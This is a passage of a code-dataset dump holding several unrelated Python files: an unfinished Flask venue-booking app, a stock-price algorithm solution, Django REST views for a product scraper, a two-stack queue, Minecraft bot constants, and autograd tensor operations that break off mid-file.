@localhost:5432/fyyurapp'\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\n\r\n#----------------------------------------------------------------------------#\r\n# Models.\r\n#----------------------------------------------------------------------------#\r\n\r\nclass Artist (db.Model):\r\n __tablename__ = 'artist'\r\n id = db.Column (db.Integer, primary_key=True)\r\n name = db.Column (db.String(150), nullable=False)\r\n city = db.Column (db.String(150), nullable=False)\r\n state = db.Column (db.String(150), nullable=False)\r\n phone = db.Column (db.String(150), nullable=False)\r\n address = db.Column (db.String(120), nullable=False)\r\n genres = db.Column (db.String(200), nullable=False)\r\n facebook_link = db.Column (db.String(120))\r\n image_link = db.Column (db.String(500))\r\n website = db.Column (db.String(150), nullable=False)\r\n \r\n def __repr__(self):\r\n return f''\r\n\r\n\r\nclass Venue (db.Model):\r\n __tablename__ = 'venue' \r\n id = db.Column (db.Integer, primary_key=True)\r\n name = db.Column (db.String(150), nullable=False)\r\n city = db.Column (db.String(120), nullable=False)\r\n state = db.Column (db.String(150), nullable=False)\r\n address = db.Column(db.String(120),nullable=False)\r\n phone = db.Column(db.String(120), nullable=False)\r\n genres = db.Column(db.String(300), nullable=False)\r\n facebook_link = db.Column(db.String(120))\r\n image_link = db.Column(db.String(500))\r\n website = db.Column(db.String(120), nullable=False)\r\n # shows = db.Relationship('Show', backref='venue', lazy=False)\r\n \r\n def __repr__(self):\r\n return f''\r\n\r\n\r\nclass Show(db.Model):\r\n __tablename__ = 'show'\r\n \r\n id = db.Column(db.Integer, primary_key=True)\r\n date = db.Column(db.DateTime, nullable=False)\r\n artist_id = db.Column(db.Integer, db.ForeignKey(\"artist.id\"), nullable=False)\r\n venue_id = db.Column(db.Integer, db.ForeignKey(\"venue.id\"), nullable=False)\r\n\r\n def __repr__(self):\r\n return f''\r\n\r\n\r\n# TODO: implement any missing fields, as a database migration using Flask-Migrate\r\n# TODO Implement Show and Artist models, and complete all model relationships and properties, as a database migration.\r\n\r\n\r\n#----------------------------------------------------------------------------#\r\n# Filters.\r\n#----------------------------------------------------------------------------#\r\n\r\ndef format_datetime(value, format='medium'):\r\n date = dateutil.parser.parse(value)\r\n if format == 'full':\r\n format=\"EEEE MMMM, d, y 'at' h:mma\"\r\n elif format == 'medium':\r\n format=\"EE MM, dd, y h:mma\"\r\n return babel.dates.format_datetime(date, format, locale='en')\r\n\r\napp.jinja_env.filters['datetime'] = format_datetime\r\n\r\n#----------------------------------------------------------------------------#\r\n# Controllers.\r\n#----------------------------------------------------------------------------#\r\n\r\n@app.route('/')\r\ndef index():\r\n return render_template('pages/home.html')\r\n\r\n\r\n# Venues\r\n# ----------------------------------------------------------------\r\n\r\n@app.route('/venues')\r\ndef venues():\r\n # TODO: replace with real venues data.\r\n # num_upcoming_shows should be aggregated based on number of upcoming shows per venue.\r\n areas = []\r\n data = Venue.query.order_by('city', 'state', 'name').all()\r\n for place in data:\r\n area_item = {}\r\n loc_area = -1\r\n if len(areas) == 0:\r\n loc_area = 0\r\n area_item = {\r\n \"city\" : place.city,\r\n \"state\": place.state,\r\n \"venues\": []\r\n }\r\n areas.append(area_item)\r\n else:\r\n for i, area in enumerate(areas):\r\n if area['city'] == place.city and area['state'] == place.state:\r\n loc_area = i\r\n break\r\n if loc_area < 0:\r\n area_item = {\r\n \"city\": place.city,\r\n \"state\": place.state,\r\n \"venues\": []\r\n }\r\n areas.append(area_item)\r\n loc_area = len(areas) - 1\r\n else:\r\n area_item = areas[loc_area]\r\n v = {\r\n \"id\": place.id,\r\n \"name\": place.name,\r\n \"num_upcoming_shows\": 5\r\n # num_upcoming_shows should be aggregated based on number of upcoming shows per venue.\r\n }\r\n area_item['venues'].append(v)\r\n areas[loc_area] = area_item\r\n\r\n return render_template('pages/venues.html', areas=areas)\r\n \r\n\r\n@app.route('/venues/search', methods=['POST'])\r\ndef search_venues():\r\n # TODO: implement search on artists with partial string search. Ensure it is case-insensitive.\r\n # seach for Hop should return \"The Musical Hop\".\r\n # search for \"Music\" should return \"The Musical Hop\" and \"Park Square Live Music & Coffee\"\r\n search_name = request.form.get('search_name')\r\n search = \"%{}%\".format(search_name.replace(\" \", \"\\ \"))\r\n data = Artist.query.filter(Artist.name.match(search)).order_by('name').all()\r\n items = []\r\n for row in data:\r\n aux = {\r\n \"id\": row.id,\r\n \"name\": row.name,\r\n # \"\" :\r\n }\r\n items.append(aux)\r\n\r\n response={\r\n \"count\": len(items),\r\n \"data\": items\r\n }\r\n\r\n return render_template('pages/search_venues.html', results=response, search_name=request.form.get('search_name', ''))\r\n\r\n\r\n@app.route('/venues/')\r\ndef show_venue(venue_id):\r\n # shows the venue page with the given venue_id\r\n # TODO: replace with real venue data from the venues table, using venue_id\r\n data = Venue.query.filter_by(id=venue_id).first()\r\n data.genres = json.loads(data.genres)\r\n upcoming_shows = []\r\n past_shows = []\r\n for show in data.shows:\r\n if show.date > datetime.now():\r\n upcoming_shows.append(show)\r\n else:\r\n past_shows.append(show)\r\n data.upcoming_shows = upcoming_shows\r\n data.past_shows = past_shows\r\n\r\n return render_template('pages/show_venue.html', venue=data)\r\n\r\n\r\n# Create Venue\r\n# ----------------------------------------------------------------\r\n\r\n@app.route('/venues/create', methods=['GET'])\r\ndef create_venue_form():\r\n app = Flask(__name__)\r\n csrf.init_app(app)\r\n form = VenueForm()\r\n return render_template('forms/new_venue.html', form=form)\r\n\r\n@app.route('/venues/create', methods=['POST'])\r\ndef create_venue_submission():\r\n # TODO: insert form data as a new Venue record in the db, instead\r\n # TODO: modify data to be the data object returned from db insertion\r\n app = Flask(__name__)\r\n csrf.init_app(app)\r\n error = False\r\n body = {}\r\n request_data = request.get_json()\r\n try:\r\n name = request_data['name']\r\n city = request_data['city']\r\n state = request_data['state']\r\n phone = request_data['phone']\r\n address = request_data['address']\r\n genres = json.dumps(request_data['genres'])\r\n facebook_link = request_data['facebook_link']\r\n image_link = request_data['image_link']\r\n website = request_data['website']\r\n venue = Venue(name=name, city=city, state=state, phone=phone, address=address, genres=genres, facebook_link=facebook_link, image_link=image_link, website=website)\r\n db.session.add(venue)\r\n db.session.commit()\r\n except:\r\n db.session.rollback()\r\n error = True\r\n print(sys.exc_info())\r\n finally:\r\n db.session.close()\r\n if error:\r\n abort(500)\r\n body['success'] = False\r\n flash('An error occurred. Venue' + data.name + ' could not be listed.')\r\n body['msg'] = ' An error occured '\r\n else:\r\n # on successful db insert, flash success\r\n body['success'] = True\r\n flash('Venue ' + request.form['name'] + ' was successfully listed!')\r\n \r\n return jsonify(body)\r\n\r\n\r\n\r\n # TODO: on unsuccessful db insert, flash an error instead.\r\n # e.g., flash('An error occurred. Venue ' + data.name + ' could not be listed.')\r\n # see: http://flask.pocoo.org/docs/1.0/patterns/flashing/\r\n\r\n@app.route('/venues/', methods=['DELETE'])\r\ndef delete_venue(venue_id):\r\n # TODO: Complete this endpoint for taking a venue_id, and using\r\n data = Venue.query.filter_by(venue_id).delete()\r\n\r\n # SQLAlchemy ORM to delete a record. Handle cases where the session commit could fail.\r\n\r\n # BONUS CHALLENGE: Implement a button to delete a Venue on a Venue Page, have it so that\r\n # clicking that button delete it from the db then redirect the user to the homepage\r\n \r\n\r\n# Artists\r\n# ----------------------------------------------------------------\r\n@app.route('/artists')\r\ndef artists():\r\n # TODO: replace with real data returned from querying the database\r\n data = Artist.query.order_by('name').all()\r\n return render_template('pages/artists.html', artists=data)\r\n\r\n@app.route('/artists/search', methods=['POST'])\r\ndef search_artists():\r\n # TODO: implement search on artists with partial string search. Ensure it is case-insensitive.\r\n # seach for \"A\" should return \"Guns N Petals\", \"Matt Quevado\", and \"The Wild Sax Band\".\r\n # search for \"band\" should return \"The Wild Sax Band\".\r\n \r\n search_term = request.form.get('search_term')\r\n search = \"%{}%\".format(search_term.replace(\" \", \"\\ \"))\r\n data = Artist.query.filter(Artist.name.match(search)).order_by('name').all()\r\n items = []\r\n for row in data:\r\n aux = {\r\n \"id\": row.id,\r\n \"name\": row.name,\r\n \"num_upcoming_shows\": len(row.shows)\r\n }\r\n items.append(aux)\r\n response={\r\n \"count\": len(items),\r\n \"data\": items\r\n }\r\n return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\r\n\r\n\r\n@app.route('/artists/')\r\ndef show_artist(artist_id):\r\n # shows the artist page with the given artist_id\r\n # TODO: replace with real artist data from the artist table, using artist_id\r\n data = Artist.query.filter_by(id=artist_id).first()\r\n data.genres = json.loads(data.genres)\r\n\r\n upcoming_shows = []\r\n past_shows = []\r\n for show in data.shows:\r\n if show.date > datetime.now():\r\n upcoming_shows.append(show)\r\n else:\r\n past_shows.append(show)\r\n data.upcoming_shows = upcoming_shows\r\n data.past_shows = past_shows\r\n\r\n return render_template('pages/show_artist.html', artist=data)\r\n\r\n\r\n# Update\r\n# ----------------------------------------------------------------\r\n@app.route('/artists//edit', methods=['GET'])\r\ndef edit_artist(artist_id):\r\n form = ArtistForm()\r\n artist= Artist.query.filter_by(id=artist_id).first()\r\n\r\n form.name.data = artist.name\r\n form.city.data = artist.city\r\n form.state.data = artist.state\r\n form.phone.data = artist.phone\r\n form.facebook_link.data = artist.facebook_link\r\n form.website.data = artist.website\r\n form.image_link.data = artist.image_link\r\n form.genres.data = json.loads(artist.genres)\r\n # TODO: populate form with fields from artist with ID \r\n \r\n return render_template('forms/edit_artist.html', form=form, artist=artist)\r\n\r\n@app.route('/artists//edit', methods=['POST'])\r\ndef edit_artist_submission(artist_id):\r\n # TODO: take values from the form submitted, and update existing\r\n # artist record with ID using the new attributes\r\n app = Flask(__name__)\r\n csrf.init_app(app)\r\n error = False\r\n body = {}\r\n request_data = request.get_json()\r\n try:\r\n artist = Artist.query.filter_by(id=artist_id).first()\r\n artist.name = request_data['name']\r\n artist.city = request_data['city']\r\n artist.state = request_data['state']\r\n artist.phone = request_data['phone']\r\n artist.genres = json.dumps(request_data['genres'])\r\n artist.facebook_link = request_data['facebook_link']\r\n artist.website = request_data['website']\r\n artist.image_link = request_data['image_link']\r\n db.session.add(artist)\r\n db.session.commit()\r\n except:\r\n db.session.rollback()\r\n error = True\r\n print(sys.exc_info())\r\n finally:\r\n db.session.close()\r\n if error:\r\n abort(500)\r\n body['success'] = False\r\n body['msg'] = 'There was an error '\r\n else:\r\n body['msg'] = 'That create was sucessfully'\r\n body['success'] = True\r\n\r\n return jsonify(body)\r\n return redirect(url_for('show_artist', artist_id=artist_id))\r\n\r\n@app.route('/venues//edit', methods=['GET'])\r\ndef edit_venue(venue_id):\r\n form = VenueForm()\r\n place = Venue.query.filter_by(id=venue_id).first()\r\n\r\n form.name.data = place.name\r\n form.city.data = place.city\r\n form.state.data = place.state\r\n form.phone.data = place.phone\r\n form.address.data = place.address\r\n form.facebook_link.data = place.facebook_link\r\n form.website.data = place.website\r\n form.image_link.data = place.image_link\r\n form.genres.data = json.loads(place.genres)\r\n \r\n return render_template('forms/edit_venue.html', form=form, place=place)\r\n\r\n # TODO: populate form with values from venue with ID \r\n\r\n@app.route('/venues//edit', methods=['POST'])\r\ndef edit_venue_submission(venue_id):\r\n # TODO: take values from the form submitted, and update existing\r\n # venue record with ID using the new attributes\r\n app = Flask(__name__)\r\n csrf.init_app(app)\r\n error = False\r\n body = {}\r\n request_data = request.get_json()\r\n try:\r\n place = Venue.query.filter_by(id=venue_id).first()\r\n place.name = request_data['name']\r\n place.city = request_data['city']\r\n place.state = request_data['state']\r\n place.phone = request_data['phone']\r\n place.address = request_data['address']\r\n place.genres = json.dumps(request_data['genres'])\r\n place.facebook_link = request_data['facebook_link']\r\n place.website = request_data['website']\r\n place.image_link = request_data['image_link']\r\n db.session.add(place)\r\n db.session.commit()\r\n except:\r\n db.session.rollback()\r\n error = True\r\n print(sys.exc_info())\r\n finally:\r\n db.session.close()\r\n if error:\r\n abort(500)\r\n body['success'] = False\r\n body['msg'] = 'There was an error '\r\n else:\r\n body['msg'] = 'That create was sucessfully'\r\n body['success'] = True\r\n \r\n return jsonify(body)\r\n return redirect(url_for('show_venue', venue_id=venue_id))\r\n\r\n# Create Artist\r\n# ----------------------------------------------------------------\r\n\r\n@app.route('/artists/create', methods=['GET'])\r\ndef create_artist_form():\r\n app = Flask(__name__)\r\n csrf.init_app(app)\r\n form = ArtistForm()\r\n return render_template('forms/new_artist.html', form=form)\r\n\r\n\r\n@app.route('/artists/create', methods=['POST'])\r\ndef create_artist_submission():\r\n # called upon submitting the new artist listing form\r\n # TODO: insert form data as a new Venue record in the db, instead\r\n # TODO: modify data to be the data object returned from db insertion\r\n app = Flask(__name__)\r\n csrf.init_app(app)\r\n error = False\r\n body = {}\r\n request_data = request.get_json()\r\n\r\n\r\n # on successful db insert, flash success\r\n flash('Artist ' + request.form['name'] + ' was successfully listed!')\r\n # TODO: on unsuccessful db insert, flash an error instead.\r\n # e.g., flash('An error occurred. Artist ' + data.name + ' could not be listed.')\r\n\r\n\r\n# Shows\r\n# ----------------------------------------------------------------\r\n\r\n@app.route('/shows')\r\ndef shows():\r\n # displays list of shows at /shows\r\n # TODO: replace with real venues data.\r\n rows = db.session.query(Show, Artist, Venue).join(Artist).join(Venue).filter(Show.date > datetime.now()).order_by('date').all()\r\n data = []\r\n for row in rows:\r\n item = {\r\n 'venue_id': row.Venue.id,\r\n 'artist_id': row.Artist.id,\r\n 'venue_name': row.Venue.name,\r\n 'artist_name': row.Artist.name,\r\n 'artist_image_link': row.Artist.image_link,\r\n 'start_time': row.Show.date.strftime('%Y-%m-%d %H:%I')\r\n }\r\n data.append(item)\r\n \r\n return render_template('pages/shows.html', shows=data)\r\n \r\n\r\n\r\n@app.route('/shows/create')\r\ndef create_shows():\r\n # renders form. do not touch.\r\n form = ShowForm()\r\n return render_template('forms/new_show.html', form=form)\r\n\r\n\r\n@app.route('/shows/create', methods=['POST'])\r\ndef create_show_submission():\r\n app = Flask(__name__)\r\n csrf.init_app(app)\r\n error = False\r\n body = {}\r\n request_data = request.get_json()\r\n try:\r\n artist_id = request_data['artist_id']\r\n venue_id = request_data['venue_id']\r\n start_time = request_data['start_time']\r\n\r\n show = Show(artist_id=artist_id, venue_id=venue_id, date=start_time)\r\n db.session.add(show)\r\n db.session.commit()\r\n except:\r\n db.session.rollback()\r\n error = True\r\n print(sys.exc_info())\r\n finally:\r\n db.session.close()\r\n if error:\r\n abort(500)\r\n body['success'] = False\r\n body['msg'] = 'There an error '\r\n else:\r\n # on successful db insert, flash success\r\n body['success'] = True\r\n flash('Show was successfully listed!')\r\n body['msg'] = 'That create was sucessfully'\r\n\r\n return jsonify(body)\r\n\r\n\r\n \r\n # TODO: on unsuccessful db insert, flash an error instead.\r\n # e.g., flash('An error occurred. Show could not be listed.')\r\n # see: http://flask.pocoo.org/docs/1.0/patterns/flashing/\r\n# return render_template('pages/home.html')\r\n\r\n@app.errorhandler(404)\r\ndef not_found_error(error):\r\n return render_template('errors/404.html'), 404\r\n\r\n@app.errorhandler(500)\r\ndef server_error(error):\r\n return render_template('errors/500.html'), 500\r\n\r\n\r\nif not app.debug:\r\n file_handler = FileHandler('error.log')\r\n file_handler.setFormatter(\r\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\r\n )\r\n app.logger.setLevel(logging.INFO)\r\n file_handler.setLevel(logging.INFO)\r\n app.logger.addHandler(file_handler)\r\n app.logger.info('errors')\r\n\r\n\r\n\r\n#----------------------------------------------------------------------------#\r\n# Launch.\r\n#----------------------------------------------------------------------------#\r\n\r\n# Default port:\r\nif __name__ == '__main__':\r\n port = int(os.environ.get('PORT', 3000))\r\n app.run(host='0.0.0.0', port=port)\r\n\r\n# Or specify port manually:\r\n'''\r\nif __name__ == '__main__':\r\n port = int(os.environ.get('PORT', 5000))\r\n app.run(host='0.0.0.0', port=port)\r\n'''\r\n","repo_name":"wildabyss37/fyyur_app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":19729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14050453061","text":"from collections import deque\n\ndef solution(prices):\n answer = []\n \n q = deque(prices)\n while q:\n time = 0\n now = q.popleft()\n for p in q:\n time += 1\n if now > p:\n break\n answer.append(time)\n \n return answer","repo_name":"ktaehyun/prepare_codingtest","sub_path":"프로그래머스/lv2/42584. 주식가격/주식가격.py","file_name":"주식가격.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"73649231923","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework import status\n\n\nfrom util.scrape import get_all_good_info\nfrom users.auth import authenticate_jwt\nfrom util.stats import set_time_values, get_stats_list, filter_records, validate_url_query_params\nfrom .models import Card, Record\nfrom .serializers import CardSerializer\nfrom main.celery import celery_app\n\n\nclass AllCardsView(APIView):\n def get(self, request):\n payload = authenticate_jwt(request)\n user_id = payload.get('id')\n user_cards = Card.objects.filter(user_id=user_id)\n\n data = []\n for card in user_cards:\n serializer = CardSerializer(card)\n data.append(serializer.data)\n\n return Response(data, status=status.HTTP_200_OK)\n\n def post(self, request):\n payload = authenticate_jwt(request)\n user_id = payload.get('id')\n\n articul = request.data.get('articul')\n if not articul:\n raise ValidationError(dict(message='Need articul field'))\n\n if not articul.isdigit():\n raise ValidationError(dict(message='Articul must be a number'))\n\n good_info = get_all_good_info(articul)\n\n if not good_info:\n raise ValidationError(dict(message='Non-existing articul'))\n\n data = {\n 'user_id': user_id,\n **good_info,\n }\n serializer = CardSerializer(data=data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n\n def delete(self, request):\n payload = authenticate_jwt(request)\n user_id = payload['id']\n\n user_cards = Card.objects.filter(user_id=user_id)\n for card in user_cards:\n card.delete()\n\n return Response(dict(message='All cards deleted'), status=status.HTTP_204_NO_CONTENT)\n\n\nclass SingleCardView(APIView):\n def delete(self, request, pk):\n payload = authenticate_jwt(request)\n user_id = payload['id']\n\n user_card = Card.objects.filter(user_id=user_id).filter(id=pk)\n user_card.delete()\n\n return Response(dict(message=f'Card with id {pk} deleted'), status=status.HTTP_204_NO_CONTENT)\n\n\nclass UpdateInfoView(APIView):\n def get(self, request):\n celery_app.send_task('cards.tasks.get_and_update_good_info')\n return Response(dict(message='Task for updating is sent'), status=status.HTTP_200_OK)\n\n\nclass CardStatsView(APIView):\n def get(self, request, pk):\n payload = authenticate_jwt(request)\n user_id = payload['id']\n user_card = Card.objects.filter(id=pk).first()\n\n if not user_card:\n return Response(dict(message=f'Card with id {pk} not found'), status=status.HTTP_404_NOT_FOUND)\n\n if not user_card.user_id == user_id:\n return Response(dict(message=f'It is not your card'), status.HTTP_403_FORBIDDEN)\n\n records = Record.objects.filter(articul=user_card.articul)\n start_date, end_date, interval = validate_url_query_params(self.request.query_params)\n\n records = filter_records(records, start_date, end_date)\n time_to_check, time_last, time_interval = set_time_values(records, interval)\n stats = get_stats_list(records, time_to_check, time_last, time_interval)\n\n return Response(dict(\n articul=user_card.articul,\n stats=stats,\n ), status=status.HTTP_200_OK)\n","repo_name":"genndy007/wb_scraper","sub_path":"src/cards/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"40854352664","text":"from chapter_3.datastructs import Stack\n\nclass MyQueue:\n s_in = Stack()\n s_out = Stack()\n \n def push(self, elem: int):\n self.s_in.push(elem)\n\n def pop(self):\n if self.s_out.isEmpty():\n self._pour(self.s_in, self.s_out)\n return self.s_out.pop()\n\n def isEmpty(self):\n return self.s_in.isEmpty() and self.s_out.isEmpty()\n\n def peek(self):\n if self.s_out.isEmpty():\n self._pour(self.s_in, self.s_out)\n self.s_out.peek()\n\n def size(self):\n return self.s_in.size + self.s_out.size\n \n @staticmethod\n def _pour(s_from:Stack, s_to:Stack):\n while not s_from.isEmpty():\n s_to.push(s_from.pop())\n \n def __str__(self):\n return f\"Ha! I'm actually 2 stacks: {self.s_in} and {self.s_out}\"\n\n\ndef test_myQueue():\n myq = MyQueue()\n for i in range(5):\n myq.push(i)\n \n print(f\"Is empty ? {myq.isEmpty()} ---> {myq}\")\n\n for i in range(5):\n print(myq.pop())\n \n try:\n myq.pop()\n except Exception as e:\n print(f\"Oh no, got {e}, but queue has elem ? {not myq.isEmpty()}\")\n\n for i in range(10,15):\n myq.push(i) \n \n print(myq.pop())\n\n for i in range(15,20):\n myq.push(i) \n print(myq)\n\nif __name__ == '__main__':\n test_myQueue()\n ","repo_name":"StBogdan/CTCI_python","sub_path":"chapter_3/p3_4.py","file_name":"p3_4.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":317,"dataset":"github-code","pt":"75"} +{"seq_id":"18667482979","text":"from mcdreforged.api.rtext import RTextTranslation, RColor\n\nCONFIG_FILE_NAME = 'config.json'\nDATA_FILE_NAME = 'botList.json'\n\n\nclass DIMENSION:\n OVERWORLD = 0\n THE_NETHER = -1\n THE_END = 1\n\n DISPLAY_TRANSLATION = {\n 0: RTextTranslation(\n 'createWorld.customize.preset.overworld',\n color=RColor.green\n ),\n -1: RTextTranslation(\n 'advancements.nether.root.title',\n color=RColor.dark_red\n ),\n 1: RTextTranslation(\n 'advancements.end.root.title',\n color=RColor.light_purple\n )\n }\n USING_TRANSLATION = {\n 0: 'minecraft:overworld',\n -1: 'minecraft:the_nether',\n 1: 'minecraft:the_end'\n }\n COMMAND_TRANSLATION = {\n '0': OVERWORLD,\n '-1': THE_NETHER,\n '1': THE_END,\n 'overworld': OVERWORLD,\n 'the_nether': THE_NETHER,\n 'the_end': THE_END,\n 'minecraft:overworld': OVERWORLD,\n 'minecraft:the_nether': THE_NETHER,\n 'minecraft:the_end': THE_END,\n 'nether': THE_NETHER,\n 'end': THE_END\n }\n","repo_name":"AnzhiZhang/MCDReforgedPlugins","sub_path":"bot/bot/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":82,"dataset":"github-code","pt":"75"} +{"seq_id":"18206761302","text":"from __future__ import annotations\nimport numpy as np\nfrom typing import List, Tuple, Union\n\nfrom .operation import Operation\nfrom .. import tensor\n\n\nclass TensorContraction(Operation):\n \"\"\"f(inputs) = tensordot(inputs[0], inputs[1], axes)\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n axes: int):\n super().__init__(inputs)\n self.axes = axes\n \n \n def _forward(self):\n (a, b) = self.inputs\n return tensor.Tensor(np.tensordot(a.data, b.data, axes=self.axes))\n \n \n def _backward(self,\n output_grad: np.array):\n (a, b) = self.inputs\n \n left_dim = len(a.data.shape) - self.axes\n right_dim = len(b.data.shape) - self.axes\n\n input_grad_a = np.tensordot(output_grad, b.data, axes=[range(-1, -right_dim - 1, -1)] * 2)\n input_grad_b = np.tensordot(a.data, output_grad, axes=[range(left_dim)] * 2)\n\n return (input_grad_a, input_grad_b)\n \n \nclass TensorSum(Operation):\n \"\"\"f(inputs) = inputs[0].sum(axis, keepdims)\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n axis: Union[int, Tuple[int, int]] = None,\n keepdims: bool = False):\n super().__init__(inputs)\n if type(axis) is int:\n axis = (axis,)\n if axis is None:\n axis = tuple(range(len(self.inputs[0].shape)))\n \n self.axis = axis\n self.keepdims = keepdims\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data.sum(axis=self.axis, keepdims=self.keepdims))\n \n \n def _backward(self,\n output_grad: np.array):\n if not self.keepdims:\n output_grad = np.expand_dims(output_grad, axis=self.axis)\n \n input_grad = np.broadcast_to(output_grad, shape=self.inputs[0].shape)\n \n return (input_grad,)\n \n \nclass TensorMax(Operation):\n \"\"\"f(inputs) = inputs[0].max(axis, keepdims)\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n axis: Union[int, Tuple[int, int]] = None,\n keepdims: bool = False):\n super().__init__(inputs)\n if type(axis) is int:\n axis = (axis,)\n if axis is None:\n axis = tuple(range(len(self.inputs[0].shape)))\n \n self.axis = axis\n self.keepdims = keepdims\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data.max(axis=self.axis, keepdims=self.keepdims))\n \n \n def _backward(self,\n output_grad: np.array):\n output = self.output.data\n\n if not self.keepdims:\n output_grad = np.expand_dims(output_grad, axis=self.axis)\n output = np.expand_dims(output, axis=self.axis)\n\n mask = self.inputs[0].data == np.broadcast_to(output, self.inputs[0].shape)\n\n input_grad = mask * np.broadcast_to(output_grad, shape=self.inputs[0].shape)\n \n return (input_grad,)\n \n \nclass TensorMin(Operation):\n \"\"\"f(inputs) = inputs[0].min(axis, keepdims)\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n axis: Union[int, Tuple[int, int]] = None,\n keepdims: bool = False):\n super().__init__(inputs)\n if type(axis) is int:\n axis = (axis,)\n if axis is None:\n axis = tuple(range(len(self.inputs[0].shape)))\n \n self.axis = axis\n self.keepdims = keepdims\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data.min(axis=self.axis, keepdims=self.keepdims))\n \n \n def _backward(self,\n output_grad: np.array):\n output = self.output.data\n\n if not self.keepdims:\n output_grad = np.expand_dims(output_grad, axis=self.axis)\n output = np.expand_dims(output, axis=self.axis)\n\n mask = self.inputs[0].data == np.broadcast_to(output, self.inputs[0].shape)\n\n input_grad = mask * np.broadcast_to(output_grad, shape=self.inputs[0].shape)\n \n return (input_grad,)\n \n \nclass TensorSlice(Operation):\n \"\"\"f(inputs) = inputs[0][key]\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n key):\n super().__init__(inputs)\n if type(key) is not tuple:\n key = (key,)\n\n # If any elements in key are Tensor, convert to np.array\n key = tuple(k.data if isinstance(k, tensor.Tensor) else k for k in key)\n \n # Numpy slicing is quite involved and it's hard to cover every edge case\n # For now, we guarantee backprop supports slicing with ints, slices, boolean mask,\n # and a single leading 2D list, e.g. x[[[0, 1, 2], [5, 2, 3]], 2, :, 2:5:-1].\n # This covers most practical cases.\n for key_i in key[1:]:\n assert self._is_valid_slice(key_i)\n\n self.key = key\n self.key0_ndim = self._1d_or_2d_int_list(key[0])\n assert self._is_valid_slice(key[0]) or self.key0_ndim != -1 \n\n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data[self.key])\n \n \n def _backward(self,\n output_grad: np.array):\n input_grad = np.zeros(self.inputs[0].shape, dtype=tensor.Tensor.DEFAULT_DTYPE)\n\n if self.key0_ndim == -1:\n input_grad[self.key] = output_grad\n\n else:\n for (i, subarray) in enumerate(self.key[0]):\n input_grad[(subarray,) + self.key[1:]] += output_grad[i]\n\n return (input_grad,)\n \n\n def _is_valid_slice(self, s):\n \"\"\"Slice is valid if None, int, slice, or boolean mask.\"\"\"\n if s is None:\n return True\n if isinstance(s, (np.integer, int, slice)):\n return True\n if np.array(s).dtype == bool:\n return True\n return False\n\n \n def _1d_or_2d_int_list(self, s):\n \"\"\"Returns 2 if 2d int list, 1 if 1d int list, -1 if neither.\"\"\"\n s = np.array(s)\n if s.dtype == int and s.ndim in [1, 2]:\n return s.ndim\n else:\n return -1\n\n\nclass TensorSetSlice(Operation):\n \"\"\"output = inputs[0]; output[key] = inputs[1]; f(inputs) = output\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n key):\n super().__init__(inputs)\n if type(key) is not tuple:\n key = (key,)\n\n # If any elements in key are Tensor, convert to np.array\n key = tuple(k.data if isinstance(k, tensor.Tensor) else k for k in key)\n \n self.key = key\n \n \n def _forward(self):\n (a, b) = [i.data for i in self.inputs]\n a = a.copy() # Todo: make this operation in-place\n a[self.key] = b\n return tensor.Tensor(a)\n \n \n def _backward(self,\n output_grad: np.array):\n input_grad_a = output_grad.copy()\n input_grad_a[self.key] = 0\n input_grad_b = output_grad[self.key]\n return (input_grad_a, input_grad_b)\n \n \nclass TensorReshape(Operation):\n \"\"\"f(inputs) = inputs[0].reshape(new_shape)\"\"\"\n\n def __init__(self,\n inputs: List[Tensor],\n new_shape: Tuple[int]):\n super().__init__(inputs)\n self.new_shape = new_shape\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data.reshape(self.new_shape))\n \n \n def _backward(self,\n output_grad: np.array):\n input_grad = output_grad.reshape(self.inputs[0].shape)\n \n return (input_grad,)\n \n \nclass TensorSwapaxes(Operation):\n \"\"\"f(inputs) = inputs[0].swapaxes(dim0, dim1)\"\"\"\n \n def __init__(self,\n inputs: List[Tensor],\n dim0: int,\n dim1: int):\n super().__init__(inputs)\n self.dim0 = dim0\n self.dim1 = dim1\n \n \n def _forward(self):\n assert len(self.inputs) == 1\n return tensor.Tensor(self.inputs[0].data.swapaxes(self.dim0, self.dim1))\n \n \n def _backward(self,\n output_grad: np.array):\n input_grad = output_grad.swapaxes(self.dim0, self.dim1)\n \n return (input_grad,)\n \n \nclass BatchMatrixMultiply(Operation):\n \"\"\"Multiplies two tensors of shape (A, B, C, ..., M, N) and (A, B, C, ..., N, P).\n\n Returns a tensor of shape (A, B, C, ..., M, P).\"\"\"\n \n def __init__(self,\n inputs: List[Tensor]):\n super().__init__(inputs)\n \n \n def _forward(self):\n assert len(self.inputs) == 2\n (a, b) = self.inputs\n assert a.shape[:-2] == b.shape[:-2] # Assert first N-2 dimensions match\n\n return tensor.Tensor(a.data @ b.data)\n \n \n def _backward(self,\n output_grad: np.array):\n (a, b) = self.inputs\n input_grad_a = output_grad @ b.data.swapaxes(-1, 